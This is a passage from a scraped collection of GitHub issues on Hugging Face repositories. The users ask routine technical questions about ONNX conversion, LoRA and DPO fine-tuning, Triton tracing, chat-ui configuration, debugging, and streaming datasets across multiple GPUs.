cache_dir=cache_dir)`\r\nSo we have to comment this line and delete the `config` attribute at all and in the `_load_model` method, only keep this code:\r\n`self.auto_model = AutoModel.from_pretrained(model_name_or_path, cache_dir=cache_dir)`\r\n\r\nSincerely request. Could you please fix this issue or could you please tell me the correct way to load a peft model using sentencetransformer class?\r\n", "url": "https://github.com/huggingface/sentence-transformers/issues/2465", "state": "closed", "labels": [], "created_at": "2024-02-02T00:18:04Z", "updated_at": "2024-11-08T12:32:36Z", "user": "Shengyun-Si" }, { "repo": "huggingface/amused", "number": 3, "title": "How to generate multiple images?", "body": "Thank you for your amazing work! Could you kindly explain how to generate multiple images at a time? Thankyou", "url": "https://github.com/huggingface/amused/issues/3", "state": "closed", "labels": [], "created_at": "2024-02-01T18:03:30Z", "updated_at": "2024-02-02T10:36:09Z", "user": "aishu194" }, { "repo": "huggingface/alignment-handbook", "number": 110, "title": "DPO loss on different datasets", "body": "In parallel with #38, tho i am relating to full training instead of lora.\r\n\r\nWhen i use a different set of prefs (ie chosen and rejected) but still same instructions (ultrafeedback), i get extremely low eval/train loss, where it drops sharply in the beginning. In contrast to training on the original prefs as in the case of ultrafeedback_binarised. \r\n\r\nOn my pref dataset (Eval loss)\r\n![image](https://github.com/huggingface/alignment-handbook/assets/88869287/6794892c-b9e5-4045-b627-45024c5843e7)\r\n\r\non original pref dataset (eval loss)\r\n![image](https://github.com/huggingface/alignment-handbook/assets/88869287/539c78a9-46a1-408a-bdfc-35f8436e751f)\r\n\r\ntrain loss (mine)\r\n![image](https://github.com/huggingface/alignment-handbook/assets/88869287/216603db-30cc-477c-8198-c2365433fada)\r\n\r\noriginal\r\n![image](https://github.com/huggingface/alignment-handbook/assets/88869287/6943cc8b-0d2b-4b55-84d4-2a2465ed7537)\r\n\r\nreward margin (mine)\r\n![image](https://github.com/huggingface/alignment-handbook/assets/88869287/2c9b3f7c-ac19-4d5d-9532-6a88d3132fca)\r\n\r\noriginal reward\r\n![image](https://github.com/huggingface/alignment-handbook/assets/88869287/c8a5de1c-5f90-4709-9f1c-298ce52d697a)\r\n\r\n\r\nThis huge diff in scale seems to occur when i use pref datasets that are sampled from the reference policy instead of in the case of ultrafeedback, where it is sampled from various policies.\r\n\r\nMoreover this huge decrease in loss actually cause the DPO-ed model to perform worse across various benchmarks. Is there any intuition regarding this?", "url": "https://github.com/huggingface/alignment-handbook/issues/110", "state": "open", "labels": [], "created_at": "2024-02-01T15:49:29Z", "updated_at": "2024-02-01T15:49:29Z", "comments": 0, "user": "wj210" }, { "repo": "huggingface/chat-ui", "number": 757, "title": "Which (temperature) configurations for Zephyr chat interface?", "body": "Hi, I apologise for what is maybe an obvious question but where can I find the exact configurations for the model offered on the HF Zephyr Chat interface on https://huggingface.co/spaces/HuggingFaceH4/zephyr-chat for Zephyr 7B beta? I'm especially interested to see the temperature settings and wasn't able to find this information.", "url": "https://github.com/huggingface/chat-ui/issues/757", "state": "closed", "labels": [ "support" ], "created_at": "2024-02-01T14:27:12Z", "updated_at": "2024-02-01T14:47:13Z", "comments": 3, "user": "AylaRT" }, { "repo": "huggingface/diffusers", "number": 6804, "title": "How to only offload some parts but not whole model into cpu?", "body": "Using enable_cpu_offload() will offload the whole model into cpu, which can occupy a large part of cpu memory. How can I just offload a part of model into cpu?", "url": "https://github.com/huggingface/diffusers/issues/6804", "state": "closed", "labels": [], "created_at": "2024-02-01T07:43:04Z", "updated_at": "2024-02-02T04:59:43Z", "user": "blx0102" }, { "repo": "huggingface/transformers.js", "number": 553, "title": "How to convert BAAI/bge-m3 for Transformers.js?", "body": "### Question\n\nI tried to convert https://huggingface.co/BAAI/bge-m3 to ONNX using the instructions at https://github.com/xenova/transformers.js?tab=readme-ov-file#convert-your-models-to-onnx but I'm getting errors.\r\n\r\n```shell\r\n$ python -m scripts.convert --model_id BAAI/bge-m3\r\n\r\nFramework not specified. Using pt to export to ONNX.\r\nAutomatic task detection to feature-extraction (possible synonyms are: default, mask-generation, sentence-similarity).\r\nUsing the export variant default. Available variants are:\r\n\t- default: The default ONNX variant.\r\nUsing framework PyTorch: 2.0.1\r\nOverriding 1 configuration item(s)\r\n\t- use_cache -> False\r\n================ Diagnostic Run torch.onnx.export version 2.0.1 ================\r\nverbose: False, log level: Level.ERROR\r\n======================= 0 NONE 0 NOTE 0 WARNING 0 ERROR ========================\r\n\r\nSaving external data to one file...\r\nPost-processing the exported models...\r\nDeduplicating shared (tied) weights...\r\nValidating ONNX model models/BAAI/bge-m3/model.onnx...\r\n\t-[\u2713] ONNX model output names match reference model (last_hidden_state)\r\n\t- Validating ONNX Model output \"last_hidden_state\":\r\n\t\t-[\u2713] (2, 16, 1024) matches (2, 16, 1024)\r\n\t\t-[\u2713] all values close (atol: 0.0001)\r\nThe ONNX export succeeded and the exported model was saved at: models/BAAI/bge-m3\r\n```\r\n\r\n```shell\r\ncat test.js\r\n```\r\n```js\r\nimport { pipeline } from './src/transformers.js'\r\n\r\nconst extractor = await pipeline('feature-extraction', 'BAAI/bge-m3', {\r\n quantized: false,\r\n cache_dir: './models',\r\n local_files_only: true,\r\n})\r\n\r\nconst embedding = await extractor('hello there', { pooling: 'mean', normalize: true })\r\nconsole.log(JSON.stringify(Array.from(embedding.data), null, 2))\r\n```\r\n\r\n```shell\r\n2024-01-31 20:35:16.548 node[64946:11650151] 2024-01-31 20:35:16.548343 [E:onnxruntime:, inference_session.cc:1532 operator()] Exception during initialization: /Users/runner/work/1/s/onnxruntime/core/optimizer/initializer.cc:31 onnxruntime::Initializer::Initializer(const onnx::TensorProto &, const onnxruntime::Path &) !model_path.IsEmpty() was false. model_path must not be empty. Ensure that a path is provided when the model is created or loaded.\r\nError: Exception during initialization: /Users/runner/work/1/s/onnxruntime/core/optimizer/initializer.cc:31 onnxruntime::Initializer::Initializer(const onnx::TensorProto &, const onnxruntime::Path &) !model_path.IsEmpty() was false. model_path must not be empty. Ensure that a path is provided when the model is created or loaded.\r\n\r\n at new OnnxruntimeSessionHandler (***/transformers.js/node_modules/onnxruntime-node/dist/backend.js:27:92)\r\n at ***/transformers.js/node_modules/onnxruntime-node/dist/backend.js:64:29\r\n at process.processTicksAndRejections (node:internal/process/task_queues:77:11)\r\nSomething went wrong during model construction (most likely a missing operation). Using `wasm` as a fallback.\r\nAborted(Error: ENOENT: no such file or directory, open '***/transformers.js/dist/ort-wasm-simd-threaded.wasm')\r\nfailed to asynchronously prepare wasm: RuntimeError: Aborted(Error: ENOENT: no such file or directory, open '***/transformers.js/dist/ort-wasm-simd-threaded.wasm'). Build with -sASSERTIONS for more info.\r\nAborted(RuntimeError: Aborted(Error: ENOENT: no such file or directory, open '***/transformers.js/dist/ort-wasm-simd-threaded.wasm'). Build with -sASSERTIONS for more info.)\r\n***/transformers.js/node_modules/onnxruntime-web/dist/ort-web.node.js:6\r\n...\r\n...\r\n...\r\nError: no available backend found. ERR: [wasm] RuntimeError: Aborted(Error: ENOENT: no such file or directory, open '***/transformers.js/dist/ort-wasm-simd-threaded.wasm'). Build with -sASSERTIONS for more info.\r\n at ***/transformers.js/node_modules/onnxruntime-common/dist/ort-common.node.js:6:11822\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async m.create (***/transformers.js/node_modules/onnxruntime-common/dist/ort-common.node.js:6:11480)\r\n at async constructSession (file://***/transformers.js/src/models.js:140:16)\r\n at async Promise.all (index 1)\r\n at async XLMRobertaModel.from_pretrained (file://***/transformers.js/src/models.js:793:20)\r\n at async AutoModel.from_pretrained (file://***/transformers.js/src/models.js:5166:20)\r\n at async Promise.all (index 1)\r\n at async loadItems (file://***/transformers.js/src/pipelines.js:3116:5)\r\n at async pipeline (file://***/transformers.js/src/pipelines.js:3056:21)\r\n\r\nNode.js v20.9.0\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/553", "state": "closed", "labels": [ "question" ], "created_at": "2024-02-01T01:40:02Z", "updated_at": "2024-02-08T22:17:29Z", "user": "devfacet" }, { "repo": "huggingface/diffusers", "number": 6785, "title": "How to finetune stable diffusion img2img(like instructpix2pix or controlnet) model with only one input channel?", "body": "Hello, experts!\r\nI want to finetune stable diffusion img2img(like instructpix2pix or controlnet) model with only one input channel or greyscale image? I saw official docs says it is ok to increase the input channel from 4 to 9, but I want to know that is this ok to decrease the input channel to be one for finetuning?\r\nThanks in advance!", "url": "https://github.com/huggingface/diffusers/issues/6785", "state": "closed", "labels": [], "created_at": "2024-01-31T09:17:56Z", "updated_at": "2024-01-31T09:27:43Z", "user": "sapkun" }, { "repo": "huggingface/accelerate", "number": 2399, "title": "How to use vscode to debug the acceleration program with breakpoints? I checked a lot of information, but still didn't find a solution", "body": "How to use vscode to debug the acceleration program with breakpoints? I checked a lot of information, but still didn't find a solution\r\n![bac6887bc502257c99e34019e987bce](https://github.com/huggingface/accelerate/assets/39908586/34df89a3-cfdf-432e-93af-42586aa8be97)\r\n", "url": "https://github.com/huggingface/accelerate/issues/2399", "state": "closed", "labels": [], "created_at": "2024-01-31T09:00:32Z", "updated_at": "2024-03-10T15:05:56Z", "user": "kejia1" }, { "repo": "huggingface/datatrove", "number": 72, "title": "Tokenization in Minhash deduplication", "body": "Hi,\r\n\r\nI have noticed that the tokenization is different from those adopted by previous papers.\r\n\r\nFor example, this [paper](https://arxiv.org/abs/2107.06499) uses space tokenization, [refinedweb](https://arxiv.org/abs/2306.01116) states that they used GPT-2 tokenizer, while datatrove adopts nltk to extract n-grams.\r\n\r\nI'm wondering whether the results obtained by different tokenization methods are consistent.", "url": "https://github.com/huggingface/datatrove/issues/72", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-31T02:33:17Z", "updated_at": "2024-02-01T15:36:24Z", "user": "jordane95" }, { "repo": "huggingface/peft", "number": 1419, "title": "How to torch.jit.trace a peft model", "body": "### Feature request\r\n\r\nNeed an example of how to trace a peft model.\r\n\r\n### Motivation\r\n\r\nHi, I'm trying to deploy a Lora-finetuned llama model on Nvidia Triton server. For that I need to `traced_model = torch.jit.trace(model, model_input_dict, strict=False)`, however I encountered issues like `Tracing failed sanity checks! ERROR: Graphs differed across invocations!`\r\nand terminal output was like:\r\n```\r\n/python3.10/site-packages/transformers/models/llama/modeling_llama.py:598: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n if input_shape[-1] > 1:\r\n/python3.10/site-packages/bitsandbytes/autograd/_functions.py:300: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n if prod(A.shape) == 0:\r\n/python3.10/site-packages/bitsandbytes/autograd/_functions.py:322: UserWarning: MatMul8bitLt: inputs will be cast from torch.float32 to float16 during quantization\r\n warnings.warn(f\"MatMul8bitLt: inputs will be cast from {A.dtype} to float16 during quantization\")\r\n/python3.10/site-packages/bitsandbytes/functional.py:2016: TracerWarning: Converting a tensor to a Python number might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n nnz = nnz_row_ptr[-1].item()\r\n/python3.10/site-packages/bitsandbytes/functional.py:1714: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n assert prod(list(shapeA)) > 0, f'Input tensor dimensions need to be > 0: {shapeA}'\r\n/python3.10/site-packages/bitsandbytes/functional.py:1717: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n if shapeA[0] == 0 and dimsA == 2:\r\n/python3.10/site-packages/bitsandbytes/functional.py:1719: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n elif shapeA[1] == 0 and dimsA == 3:\r\n/python3.10/site-packages/bitsandbytes/functional.py:1741: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n shapeA[-1] == shapeB[-1]\r\n/python3.10/site-packages/bitsandbytes/functional.py:1826: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n new_row_stats.shape[0] == row_stats.shape[0]\r\n/python3.10/site-packages/bitsandbytes/functional.py:1829: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n new_col_stats.shape[0] == col_stats.shape[0]\r\n/python3.10/site-packages/transformers/models/llama/modeling_llama.py:120: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n if seq_len > self.max_seq_len_cached:\r\n/python3.10/site-packages/transformers/models/llama/modeling_llama.py:350: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n if attn_weights.size() != (bsz, self.num_heads, q_len, kv_seq_len):\r\n/python3.10/site-packages/transformers/models/llama/modeling_llama.py:357: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python value", "url": "https://github.com/huggingface/peft/issues/1419", "state": "closed", "labels": [], "created_at": "2024-01-30T22:56:10Z", "updated_at": "2024-02-06T09:16:07Z", "user": "dcy0577" }, { "repo": "huggingface/gsplat.js", "number": 56, "title": "how to change the camera clipping - and a feature request: add rotate control", "body": "Hello and thank you for your great work!\r\n\r\nI am a coding noob but managed to use the jsfiddle example to set up a page on which I can display my splats. \r\n\r\nIs it possible to change the clipping (and other) settings for the camera? If so, where should I look??\r\n\r\nAnd for the request; never mind, I was not paying attention\r\nThanks again!!", "url": "https://github.com/huggingface/gsplat.js/issues/56", "state": "closed", "labels": [], "created_at": "2024-01-30T19:20:35Z", "updated_at": "2024-01-31T16:51:30Z", "user": "murcje" }, { "repo": "huggingface/accelerate", "number": 2395, "title": "Question: how to apply device map to a paired model", "body": "Hello everybody,\r\n\r\nI have been experimenting with Mistral models and have written a small second model to be paired with it. However, I have a machine with 2 GPUs and would like to use both. I am aware that the parallelization `accelerate` uses is based on splitting the data by batches. How can I apply the device map from the Mistral model to my small second model?\r\n\r\n## Additional information\r\nThe second model which I have written injects a signal into the Mistral model at a strategic layer. However, this is done in a way that removes the possibility of inlining as I do not want to rewrite the model. How can I apply the same device map from the Mistral model?", "url": "https://github.com/huggingface/accelerate/issues/2395", "state": "closed", "labels": [], "created_at": "2024-01-30T19:17:52Z", "updated_at": "2024-02-01T19:18:08Z", "user": "EricLBuehler" }, { "repo": "huggingface/diffusers", "number": 6755, "title": "how to train a lora in inpainting model?", "body": "Is there a script to train Lora in SD 1.5 inpainting?\r\n\r\nIs there any script to train Lora in SD 1.5 inpainting that works?\r\n\r\ntry this\r\nhttps://github.com/huggingface/diffusers/tree/main/examples/research_projects/dreambooth_inpaint\r\nbut it gives error\r\n`RuntimeError: element 0 of tensors does not require grad and does not have a grad_fn`\r\n@thedarkzeno @patil-suraj", "url": "https://github.com/huggingface/diffusers/issues/6755", "state": "closed", "labels": [ "stale" ], "created_at": "2024-01-29T21:14:57Z", "updated_at": "2024-11-22T01:39:54Z", "user": "loboere" }, { "repo": "huggingface/optimum-benchmark", "number": 116, "title": "How to use optimum-benchmark for custom testing of my model", "body": "I am currently using Intel\u00ae Extension for Transformers to quantize a model, and I wonder if it is possible to utilize optimum-benchmark for testing the model. Alternatively, if there are other methods to load large models, could I conduct tests using optimum-benchmark after loading the model? Many thanks; this has been a real challenge for me, as I'm unsure how to properly test an optimized large-scale model.\r\n\r\n", "url": "https://github.com/huggingface/optimum-benchmark/issues/116", "state": "closed", "labels": [], "created_at": "2024-01-29T04:07:36Z", "updated_at": "2024-02-19T16:07:06Z", "user": "WCSY-YG" }, { "repo": "huggingface/chat-ui", "number": 747, "title": ".env.local config for llama-2-7b.Q4_K_S.gguf with llama.cpp server", "body": "I am using the following .env.local with llama-2-7b.Q4_K_S.gguf and llama prompt template\r\n```\r\nMODELS=`[\r\n {\r\n \"name\": \"llama-2-7b.Q4_K_S.gguf\",\r\n \"chatPromptTemplate\": \"[INST] <>\\n{{preprompt}}\\n<>\\n\\n{{#each messages}}{{#ifUser}}{{content}} [/INST] {{/ifUser}}{{#ifAssistant}}{{content}} [INST] {{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 2048,\r\n \"stop\": [\"\"]\r\n },\r\n \"endpoints\": [\r\n {\r\n \"url\": \"http://127.0.0.1:8080\",\r\n \"type\": \"llamacpp\"\r\n }\r\n ]\r\n }\r\n]`\r\n```\r\nI am trying to get this work with chat-ui and it doesn't work and chat-ui is frozen. However server is receiving request from client. \r\n\r\n\r\n\"image\"\r\n\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/747", "state": "open", "labels": [ "support" ], "created_at": "2024-01-29T00:54:19Z", "updated_at": "2024-02-22T14:54:08Z", "comments": 3, "user": "smamindl" }, { "repo": "huggingface/chat-ui", "number": 746, "title": "settings page does not reflect selected Theme", "body": "Settings page is always light/white regardless of the Theme selected (Dark or Light). \r\n\r\nIs this intentional or we just did not have time to respect the selected Theme?\r\n\r\nIf we need to fix this, how much work load do you expect? Just small change on the main settings page (settings/+layout.svelte) or do we need to change every UI piece in settings? I might want to fix this if this is not huge.\r\n\r\nthanks", "url": "https://github.com/huggingface/chat-ui/issues/746", "state": "open", "labels": [ "question", "front" ], "created_at": "2024-01-28T23:09:38Z", "updated_at": "2024-01-29T11:48:59Z", "user": "hungryalgo" }, { "repo": "huggingface/transformers.js", "number": 547, "title": "Text to speech generation using Xenova/mms-tts-por", "body": "### Question\n\nHi! First of all, thank you for the awesome library, it's been handy so far!\r\n\r\nI've got 2 questions regarding TTS:\r\n\r\n- I'm using the model above to create a Brazilian Portuguese spoken audio and would like to know if there are options for this model, eg.: changing the voice from male to female, and the intonation.\r\n\r\n- I discovered another model `facebook/mms-tts-por` in the compatible languages list, but I'm getting the following error: \"'Could not locate file: \"https://huggingface.co/facebook/mms-tts-por/resolve/main/tokenizer.json\".'\". Is transformer.js compatible with it?\r\n\r\nThanks in advance", "url": "https://github.com/huggingface/transformers.js/issues/547", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-28T13:51:21Z", "updated_at": "2025-01-13T22:15:35Z", "user": "Darksoulsong" }, { "repo": "huggingface/diffusers", "number": 6739, "title": "how to generate images based on the text token embedding outputted from CLIP. token_embedding module?", "body": "how to generate images based on the text token embedding outputted from CLIP. token_embedding module?", "url": "https://github.com/huggingface/diffusers/issues/6739", "state": "closed", "labels": [ "stale", "should-move-to-discussion" ], "created_at": "2024-01-28T08:51:45Z", "updated_at": "2024-11-19T09:27:00Z", "user": "FlyGreyWolf" }, { "repo": "huggingface/transformers.js", "number": 546, "title": "header is not define ", "body": "### Question\n\n![image](https://github.com/xenova/transformers.js/assets/91903346/d14b8e30-1ed1-4840-ab83-7d2fda0871a0)\r\n", "url": "https://github.com/huggingface/transformers.js/issues/546", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-28T07:59:10Z", "updated_at": "2024-01-28T09:28:27Z", "user": "BipulRahi" }, { "repo": "huggingface/datasets", "number": 6624, "title": "How to download the laion-coco dataset", "body": "The laion coco dataset is not available now. How to download it\r\n\r\nhttps://huggingface.co/datasets/laion/laion-coco", "url": "https://github.com/huggingface/datasets/issues/6624", "state": "closed", "labels": [], "created_at": "2024-01-28T03:56:05Z", "updated_at": "2024-02-06T09:43:31Z", "user": "vanpersie32" }, { "repo": "huggingface/datasets", "number": 6623, "title": "streaming datasets doesn't work properly with multi-node", "body": "### Feature request\r\n\r\nLet\u2019s say I have a dataset with 5 samples with values [1, 2, 3, 4, 5], with 2 GPUs (for DDP) and batch size of 2. This dataset is an `IterableDataset` since I am streaming it.\r\n\r\nNow I split the dataset using `split_dataset_by_node` to ensure it doesn\u2019t get repeated. And since it\u2019s already splitted, I don\u2019t have to use `DistributedSampler` (also they don't work with iterable datasets anyway)?\r\n\r\nBut in this case I noticed that the:\r\n\r\nFirst iteraton:\r\nfirst GPU will get \u2192 [1, 2]\r\nfirst GPU will get \u2192 [3, 4]\r\n\r\nSecond iteraton:\r\nfirst GPU will get \u2192 [5]\r\nfirst GPU will get \u2192 Nothing\r\n\r\nwhich actually creates an issue since in case of `DistributedSampler`, the samples are repeated internally to ensure non of the GPUs at any iteration is missing any data for gradient sync.\r\n\r\nSo my questions are:\r\n\r\n1. Here since splitting is happening before hand, how to make sure each GPU get\u2019s a batch at each iteration to avoid gradient sync issues?\r\n2. Do we need to use `DistributedSampler`? If yes, how?\r\n3. in the docstrings of `split_dataset_by_node`, this is mentioned: *\"If the dataset has a number of shards that is a factor of `world_size` (i.e. if `dataset.n_shards % world_size == 0`), then the shards are evenly assigned across the nodes, which is the most optimized. Otherwise, each node keeps 1 example out of `world_size`, skipping the other examples.\"* Can you explain the last part here?\r\n4. If `dataset.n_shards % world_size != 0`, is it possible to shard the streaming dataset on the fly to avoid the case where data is missing?\r\n\r\n### Motivation\r\n\r\nSomehow streaming datasets should work with DDP since for big LLMs a lot of data is required and DDP/multi-node is mostly used to train such models and streaming can actually help solve the data part of it.\r\n\r\n### Your contribution\r\n\r\nYes, I can help in submitting the PR once we get mutual understanding on how it should behave.", "url": "https://github.com/huggingface/datasets/issues/6623", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-01-27T23:46:13Z", "updated_at": "2025-12-08T12:26:20Z", "comments": 29, "user": "rohitgr7" }, { "repo": "huggingface/unity-api", "number": 23, "title": "I need to specify text or text_target in text classification", "body": "I try calling the api by huggingfaceapi.textclassification(\"some string\", response =>...) but got the error\"you need to specify text or text_target\". Where can I specify that in my unity C# code?", "url": "https://github.com/huggingface/unity-api/issues/23", "state": "open", "labels": [ "question" ], "created_at": "2024-01-27T19:24:25Z", "updated_at": "2024-01-27T19:24:25Z", "user": "helenawsu" }, { "repo": "huggingface/transformers.js", "number": 543, "title": "Converting a model to onnx using given script is hard(fails most of the time)", "body": "### Question\r\n\r\nI have tried to use starcoder model by bundling it using your ONNX script but it failed with some exception.\r\n\r\nModel: https://huggingface.co/HuggingFaceH4/starchat-beta\r\nor\r\nhttps://huggingface.co/bigcode/starcoderbase\r\n\r\nlogs:\r\n```bash\r\n$ python -m scripts.convert --quantize --model_id HuggingFaceH4/starchat-beta\r\nFramework not specified. Using pt to export to ONNX.\r\nmodel-00001-of-00004.safetensors: 3%|\u2588\u258f | 346M/9.96G [03:20<1:33:01, 1.72MB/s]\r\nDownloading shards: 0%| | 0/4 [03:23\r\n\r\nOriginally posted by **tamanna-mostafa** January 24, 2024\r\n1. I fine-tuned mistral 7b model with preference data (32k).\r\n2. Then I ran DPO on the fine tuned model with 12k data.\r\nThis is the command I used to run docker:\r\n```\r\naccelerate launch --config_file ./accelerate_configs/ds_zero3.yaml rlhf_dpo.py \\\r\n--model_name_or_path=\"/mnt/efs/data/tammosta/files_t/output_sft_32k\" \\\r\n--output_dir=\"/mnt/efs/data/tammosta/files_t/DPO_output_mistral_32k\" \\\r\n--data_path=\"/mnt/efs/data/tammosta/files_t/DPO_data_rbs_clean_AIF.json\" \\\r\n--use_lamma2_peft_config False \\\r\n--beta 0.1 \\\r\n--optimizer_type adamw_hf \\\r\n--learning_rate 1e-6 \\\r\n--warmup_steps 50 \\\r\n--per_device_train_batch_size 1 \\\r\n--per_device_eval_batch_size 1 \\\r\n--gradient_accumulation_steps 8 \\\r\n--lora_alpha 16 \\\r\n--lora_dropout 0.05 \\\r\n--lora_r 8 \\\r\n--max_prompt_length 2048 \\\r\n--max_length 4096 \\\r\n--num_train_epochs 4 \\\r\n--logging_steps 20 \\\r\n--save_steps 100 \\\r\n--save_total_limit 8 \\\r\n--eval_steps 50 \\\r\n--gradient_checkpointing True \\\r\n--report_to \"wandb\"\r\n```\r\n3. Now, I need to run inference on the DPO model.\r\nI ran the following commands for this:\r\n ```\r\nmodel=/data/DPO_output_mistral_32k\r\nvolume=/mnt/efs/data/tammosta/files_t:/data\r\nnum_shard=8\r\n docker run --gpus all --shm-size 1g -p 172.31.8.218:80:80 -v $volume ghcr.io/huggingface/text-generation-inference:1.1.0 --model-id $model --num-shard $num_shard --max-input-length 4095 --max-total-tokens 12000\r\n\r\n```\r\n\r\nHowever, the docker failed to initialize the model with the following error:\r\n\r\n`OSError: /data/DPO_output_mistral_32k does not appear to have a file named config.json. Checkout ' https://huggingface.co//data/DPO_output_mistral_32k/None ' for available files.`\r\n\r\nDoes anyone know how to create/find the config.json file?\r\nI'll highly appreciate any help.", "url": "https://github.com/huggingface/text-generation-inference/issues/1487", "state": "closed", "labels": [], "created_at": "2024-01-25T17:11:52Z", "updated_at": "2024-01-31T16:44:32Z", "user": "tamanna-mostafa" }, { "repo": "huggingface/transformers.js", "number": 539, "title": "How can i use this Model?", "body": "### Question\n\nHow can i use this Model? https://huggingface.co/shibing624/macbert4csc-base-chinese", "url": "https://github.com/huggingface/transformers.js/issues/539", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-25T13:12:08Z", "updated_at": "2025-10-13T04:58:48Z", "user": "wfk007" }, { "repo": "huggingface/text-generation-inference", "number": 1483, "title": "how to pdb text-generation-server", "body": "### System Info\r\n\r\n```\r\n2024-01-25T09:10:08.096040Z INFO text_generation_launcher: Runtime environment:\r\nTarget: x86_64-unknown-linux-gnu\r\nCargo version: 1.70.0\r\nCommit sha: 9f18f4c00627e1a0ad696b6774e5ad7ca8f4261c\r\nDocker label: sha-9f18f4c\r\nnvidia-smi:\r\nThu Jan 25 09:10:08 2024 \r\n +---------------------------------------------------------------------------------------+\r\n | NVIDIA-SMI 535.113.01 Driver Version: 535.113.01 CUDA Version: 12.2 |\r\n |-----------------------------------------+----------------------+----------------------+\r\n | GPU Name Persistence-M | Bus-Id Disp.A | Volatile Uncorr. ECC |\r\n | Fan Temp Perf Pwr:Usage/Cap | Memory-Usage | GPU-Util Compute M. |\r\n | | | MIG M. |\r\n |=========================================+======================+======================|\r\n | 0 NVIDIA GeForce RTX 3090 Off | 00000000:1A:00.0 Off | N/A |\r\n | 30% 28C P8 24W / 350W | 5MiB / 24576MiB | 0% Default |\r\n | | | N/A |\r\n```\r\n\r\n### Information\r\n\r\n- [X] Docker\r\n- [ ] The CLI directly\r\n\r\n### Tasks\r\n\r\n- [X] An officially supported command\r\n- [ ] My own modifications\r\n\r\n### Reproduction\r\n\r\nWhen i add `pdb.set_trace()` in .py of text-generation-server, text-generation-launcher repeats the following log and seems to be stuck:\r\n\r\n```\r\n2024-01-25T09:07:04.875448Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:07:14.894477Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:07:24.911704Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:07:34.928347Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:07:44.947306Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:07:54.965355Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:08:04.984481Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:08:15.004175Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:08:25.022317Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:08:35.041246Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:08:45.059839Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:08:55.078293Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:09:05.097024Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:09:15.117255Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:09:25.136635Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:09:35.156270Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:09:45.175864Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:09:55.194405Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:10:05.214396Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n\r\n```\r\n\r\n### Expected behavior\r\n\r\nI want to know how to debug .py of text-generation-server except logger?", "url": "https://github.com/huggingface/text-generation-inference/issues/1483", "state": "closed", "labels": [], "created_at": "2024-01-25T09:21:32Z", "updated_at": "2024-02-19T07:23:14Z", "user": "jessiewiswjc" }, { "repo": "huggingface/datasets", "number": 6614, "title": "`datasets/downloads` cleanup tool", "body": "### Feature request\r\n\r\nSplitting off https://github.com/huggingface/huggingface_hub/issues/1997 - currently `huggingface-cli delete-cache` doesn't take care of cleaning `datasets` temp 